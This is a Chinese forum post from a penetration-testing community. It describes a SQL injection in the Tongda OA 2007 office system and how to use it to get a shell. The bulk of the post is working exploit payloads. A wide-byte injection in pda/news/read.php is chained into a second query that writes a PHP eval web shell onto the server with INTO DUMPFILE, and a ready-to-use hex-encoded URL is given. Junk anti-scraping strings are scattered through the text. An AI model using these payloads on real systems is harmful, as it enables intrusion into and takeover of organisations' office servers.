中国网络渗透测试联盟
标题:
通达OA2007版本漏洞及getshell
[打印本页]
作者:
admin
时间:
2012-12-20 08:09
标题:
通达OA2007版本漏洞及getshell
目前测试通达OA2007版本
5 P) d- Q% K- L: B) Z: Z1 |7 V, @
4 d y8 V7 W8 R3 I* x7 _3 a6 } b
1 c9 ?, U* Z6 m) p6 N' f1 r
Office Anywhere 2007 网络智能办公系统
o! x+ T d' N; ~& L2 p' k
# m* u% V7 q8 S% p" y3 w. F# o
http://127.0.0.1/pda/news/read.php?P=%cf'
猪点。 暴web目录..
& e0 I0 g1 o, q- {! u0 Q
. w, H0 r. n" K4 A( F! ^: p
( S# S0 G, M/ E2 ?& Y) z5 p
这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的
1 ?; p; m4 R6 q( d& h8 ?3 P( h
1 z$ y5 k& p9 C. d
例如:SELECT * from USER where USER_ID='{$USERNAME}'
4 X% r+ F. ?( X& b1 C( U, g
其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了
+ z5 V3 G% ^' [. h! a
4 Y% O7 J' w7 Q
这个时候我们是不是可以组合起来使用哪?
# I+ y1 D B" g% q1 @; \
' ~) P) X) T- A5 I! r1 O0 \, @
第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样
6 i- F& Q1 \8 U* \
union select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10
* @/ ~9 K* ]! o8 a* r- M" u
2 ]* N* _: g+ S) W& l6 j( w3 \
这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了
& ^; {% [0 H1 X% s
+ w/ @! y5 ] |+ r; z& B$ O5 v# ?
那么问题来了,单引号可以吗?当然是不可以的,^_^。。。
6 w0 M7 [9 J$ i
: ]( G8 `& J( t% Q
那么我们用字符串格式带入进行hex编码
0 {( S) I. J9 K2 d% _5 T, {, w. M
, m8 G* o! U$ ^) p0 f6 O9 v
%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
0 Y& f: I o1 p1 Y
- v4 o8 Z1 m) J# o
测试ok,获取oa的webshell
# z6 r% N) H$ c& j- E
) b8 ], D5 u- X# f4 {
, ]4 |/ K% k! Z5 ^, T3 s
pda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
+ l: h9 h4 f* S; @* m3 ~4 @0 n
直接getwebshell
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2